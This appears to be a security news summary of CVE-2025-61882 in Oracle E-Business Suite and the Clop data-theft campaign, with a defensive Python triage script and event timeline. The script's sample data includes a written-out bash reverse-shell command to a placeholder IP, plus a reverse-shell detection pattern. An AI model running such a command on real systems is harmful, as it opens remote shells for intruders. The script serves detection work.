Critical Remote Code Execution Vulnerability in Oracle E-Business Suite Exploited by Clop Ransomware
Oracle E-Business Suite (EBS) contains a critical remote code execution (RCE) vulnerability, tracked as CVE-2025-61882, that has been actively exploited in the wild. The flaw sits in the Oracle Concurrent Processing component, specifically in the BI Publisher Integration, and carries a CVSS base score of 9.8: it is reachable over the network, requires no credentials, and is straightforward to exploit. An attacker who can reach a vulnerable EBS instance can execute arbitrary code on it without authenticating. Oracle confirmed that EBS versions 12.2.3 through 12.2.14 are affected.

Oracle released an emergency security update for the flaw. The fix has a prerequisite: customers must have applied the October 2023 Critical Patch Update before the new patch can be installed, so environments that are behind on Critical Patch Updates face a longer remediation path and should start immediately.

The Clop ransomware group exploited the vulnerability as a zero-day in a series of data theft attacks beginning in August 2025, exfiltrating significant volumes of data from multiple victims. Mandiant's CTO, Charles Carmakal, confirmed that Clop used both this zero-day and other, previously patched vulnerabilities in the campaign. Oracle's advisory published indicators of compromise that matched exploit details already shared by threat actors on Telegram, which means working exploit information was public by the time the patch appeared.

Two practical points follow for defenders. First, because the data theft ran for weeks before the flaw was disclosed, applying the patch does not by itself establish that an exposed instance is clean: any internet-facing EBS system that was reachable during the campaign window should be reviewed against Oracle's indicators and checked for unauthorized activity, as security researchers have urged. Second, business-critical applications like EBS are now a primary target for ransomware and extortion groups seeking large-scale data theft, so timely patch management for these platforms is essential. Oracle has urged all customers to prioritize the latest patches to reduce the risk of further exploitation.

Oracle's rapid release of a security alert and patch reflects the severity of CVE-2025-61882. Organizations should follow Oracle's remediation guidance closely and remain alert for related threat activity. The incident has raised concerns about the security posture of widely used ERP platforms and the likelihood that similar vulnerabilities will be exploited in future. The Clop attacks also show that threat actors chain multiple vulnerabilities to maximize impact, so closing a single CVE does not necessarily close the intrusion path. Keeping security controls current and monitoring for exploitation attempts against high-value enterprise systems remains critical.
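The following is an added triage example, not code from Oracle, Mallory, or any of the sources listed on this page. It shows how a defender might script the two checks the summary calls for: whether a host's reported EBS release falls inside Oracle's affected range (12.2.3 through 12.2.14, the only fact below taken from the advisory), and whether process listings and file digests on the host match indicators of the kinds Oracle published (IP addresses, file hashes, reverse-shell command lines). Every IP address, hash, process line and sha256sum line in the block is a constructed placeholder and must be replaced with the real IOCs from Oracle's advisory before use.

```python
"""Triage helper for CVE-2025-61882 exposure on Oracle E-Business Suite hosts.

Added example: not Oracle's, Mallory's, or any vendor's code. Only the
affected-version range (12.2.3 through 12.2.14) comes from Oracle's alert;
every IP address, file hash, process line and sha256sum line below is a
constructed placeholder and must be replaced with real IOCs before use.
"""
import re
from typing import Iterable

# Affected range per Oracle's security alert, compared as 3-part tuples.
AFFECTED_MIN = (12, 2, 3)
AFFECTED_MAX = (12, 2, 14)

# bash/ksh reverse-shell idiom: redirection to /dev/tcp/<ip>/<port> (or udp).
REVERSE_SHELL = re.compile(r"/dev/(?:tcp|udp)/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")


def parse_version(text: str) -> tuple[int, int, int]:
    """Normalise an EBS release string such as '12.2.11' or '12.2.14.0' to
    exactly three numeric components (extra components are dropped, missing
    ones become zero) so the range comparison below is elementwise."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    nums = [int(p) for p in parts[:3]] + [0] * (3 - min(len(parts), 3))
    return nums[0], nums[1], nums[2]


def is_affected(version: str) -> bool:
    """True when the release falls inside 12.2.3 .. 12.2.14 inclusive."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def find_reverse_shells(proc_lines: Iterable[str],
                        ioc_ips: frozenset[str] = frozenset()) -> list[dict]:
    """Scan process-list lines (e.g. `ps -eo pid,user,args` output) for the
    /dev/tcp reverse-shell idiom and report the remote endpoint, flagging it
    when the IP is on the supplied IOC list. An unlisted IP is still a hit:
    a reverse shell spawned by an application account is suspicious alone."""
    hits = []
    for line in proc_lines:
        m = REVERSE_SHELL.search(line)
        if m:
            ip, port = m.group(1), int(m.group(2))
            hits.append({"line": line.strip(), "remote": ip, "port": port,
                         "known_ioc": ip in ioc_ips})
    return hits


def match_hashes(sha256_lines: Iterable[str],
                 ioc_hashes: frozenset[str]) -> list[tuple[str, str]]:
    """Match `sha256sum` output ('<digest>  <path>') against IOC digests,
    case-insensitively. Returns (path, digest) pairs for each match."""
    matches = []
    for line in sha256_lines:
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 64:
            continue  # not a sha256sum line
        digest, path = parts[0].lower(), parts[1].strip()
        if digest in ioc_hashes:
            matches.append((path, digest))
    return matches


# ---- constructed sample data (placeholders, NOT real IOCs) -----------------
IOC_IPS = frozenset({"203.0.113.10"})          # RFC 5737 documentation address
IOC_HASHES = frozenset({"00" * 32})            # placeholder digest
PROCESS_SAMPLE = [
    "1001 applmgr /u01/app/jdk/bin/java -Doracle.apps.ebs.example Launcher",
    "1002 applmgr sh -c /bin/bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
    "1003 oracle  ora_pmon_EBSDB",
]
SHA256_SAMPLE = [
    f"{'00' * 32}  /tmp/dropped_example.jsp",
    f"{'ab' * 32}  /u01/app/legit_example.jar",
]

if __name__ == "__main__":
    print("12.2.11 affected:", is_affected("12.2.11"))
    for hit in find_reverse_shells(PROCESS_SAMPLE, IOC_IPS):
        print("reverse shell:", hit)
    for path, digest in match_hashes(SHA256_SAMPLE, IOC_HASHES):
        print("IOC hash match:", path, digest)
```

Run it on real data by feeding `find_reverse_shells` the output of `ps -eo pid,user,args` and `match_hashes` the output of `sha256sum` over the EBS application tier, with `IOC_IPS` and `IOC_HASHES` loaded from Oracle's advisory. A version inside the affected range is a reason to patch, not proof of compromise; a reverse-shell process under the application owner account is a reason to start incident response regardless of whether its destination is on the IOC list.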

How this story unfolded
16 events from the most recent confirmed update back to the earliest known activity.
Envoy Air confirms Oracle E-Business Suite compromise
On October 17, 2025, regional airline Envoy Air confirmed it had been compromised through Oracle E-Business Suite. This added another publicly identified victim to the growing list of organizations affected by the campaign.
Oracle releases patch for related flaw CVE-2025-61884
By October 15, 2025, reporting indicated Oracle had also released a patch for a related vulnerability, CVE-2025-61884, in addition to CVE-2025-61882. Defenders therefore had two EBS fixes to apply in the same window, not one.
Cl0p lists Harvard and claims 1.3 TB of stolen data
By October 14, 2025, Cl0p had added Harvard University to its leak site and claimed to have stolen about 1.3 TB of data. This was one of the first named victims publicly associated with the Oracle EBS campaign.
Harvard discloses breach linked to Oracle EBS zero-day
On October 13, 2025, Harvard said it was investigating a breach tied to exploitation of the Oracle EBS zero-day and that a limited number of parties in a small administrative unit were affected. The university said it had applied Oracle's patch and had not found evidence of broader compromise in other systems.
Researchers publish malware and exploit-chain details from Oracle EBS attacks
Around October 10-13, 2025, researchers disclosed technical details of the campaign, including SSRF, CRLF injection, authentication bypass, XSL template injection, and Java-based payloads such as GOLDVEIN.JAVA and SAGE malware variants. The reporting also described web shells, in-memory backdoors, outbound callbacks, and post-exploitation tooling overlaps with FIN11 activity.
Mandiant and GTIG say dozens of organizations were impacted
By October 9-10, 2025, Google Threat Intelligence Group and Mandiant reported that dozens of organizations had been breached in the Oracle EBS campaign. Their findings said attackers used multiple vulnerabilities and compromised third-party email accounts to run large-scale extortion operations.
CrowdStrike ties Oracle EBS exploitation to Cl0p and dates attacks to Aug. 9
On October 7, 2025, reporting citing CrowdStrike said exploitation of CVE-2025-61882 was linked to Cl0p, also tracked as Graceful Spider, with attacks beginning on August 9, 2025. This was a key attribution and timeline refinement for the campaign.
Leaked exploit scripts for CVE-2025-61882 circulate publicly
On October 7, 2025, researchers reported that exploit scripts for CVE-2025-61882 were circulating on Telegram. Analysis showed the attack chain abused SSRF and malicious XSL content to achieve remote code execution and reverse-shell access on Oracle EBS servers.
CISA adds CVE-2025-61882 to the KEV catalog
By October 7, 2025, CVE-2025-61882 had been added to CISA's Known Exploited Vulnerabilities catalog. The listing formally recognized the flaw as actively exploited in the wild and increased pressure on defenders to remediate quickly.
Government agencies urge organizations to patch Oracle EBS
By October 6, 2025, government defenders including the FBI, the UK government, and the Canadian Centre for Cyber Security were warning organizations to patch Oracle EBS urgently. These advisories reflected concern over active exploitation and extortion activity tied to the flaw.
Public reporting links Cl0p extortion campaign to Oracle EBS zero-day
Beginning October 5-6, 2025, multiple outlets reported that the Cl0p extortion ecosystem was exploiting CVE-2025-61882 in Oracle EBS to steal data and pressure victims. Reports said executives were receiving extortion emails claiming Oracle EBS data had been stolen, with some demands reportedly reaching $50 million.
Oracle updates advisory with new exploitation findings and IOCs
Oracle updated its advisory on October 4, 2025 after uncovering additional potential exploitation during its investigation. The alert included indicators of compromise such as IP addresses, file hashes, and reverse-shell artifacts, and replaced earlier references to possible July CPU vulnerabilities with CVE-2025-61882.
Oracle issues security alert and emergency patch for CVE-2025-61882
On October 4, 2025, Oracle published a Security Alert Advisory and released an emergency fix for CVE-2025-61882, a critical unauthenticated remote code execution flaw in Oracle E-Business Suite BI Publisher integration. Oracle said the vulnerability was being actively exploited and provided mitigation guidance for affected EBS versions 12.2.3 through 12.2.14.
Campaign detected in late September
According to later reporting, the Oracle EBS compromise campaign was only detected in late September 2025 despite having begun weeks earlier. This marked the point when defenders and vendors began investigating the broader scope of the intrusions.
Active exploitation and data theft observed by early August
Security researchers later determined that exploitation of Oracle EBS, including CVE-2025-61882, was underway by early August 2025, with one widely cited start point of August 9. Attackers used the access to steal data from victim environments for later extortion.
Cl0p-linked Oracle EBS campaign begins as early as July 2025
Later reporting and incident analysis indicate the Oracle E-Business Suite intrusion campaign started as early as July 2025, with attackers using multiple exploit chains against internet-facing EBS systems. The activity was not publicly known at the time and was only recognized later during investigations.
Sources
Regional airline Envoy Air confirms Oracle E-Business Suite compromise (therecord.media)
Oracle E-Business Suite Zero-Day (CVE-2025-61882) — Post-Incident Technical Brief (foresiet.com)
Harvard University Breached in Oracle Zero-Day Attack (darkreading.com)
Harvard University hit in Oracle EBS cyberattack, 1.3 TB of data leaked by Cl0p group (securityaffairs.com)
CVE-2025-61882: Frequently Asked Questions About Oracle E-Business Suite (EBS) Zero-Day and Associated Vulnerabilities (tenable.com)
CVE-2025-61882: Frequently Asked Questions About Oracle E-Business Suite (EBS) Zero-Day and Associated Vulnerabilities (securityboulevard.com)
Oracle Security Alerts CVE-2025-61882 (oracle.com)
Oracle patches EBS zero-day exploited in Clop data theft attacks (bleepingcomputer.com)


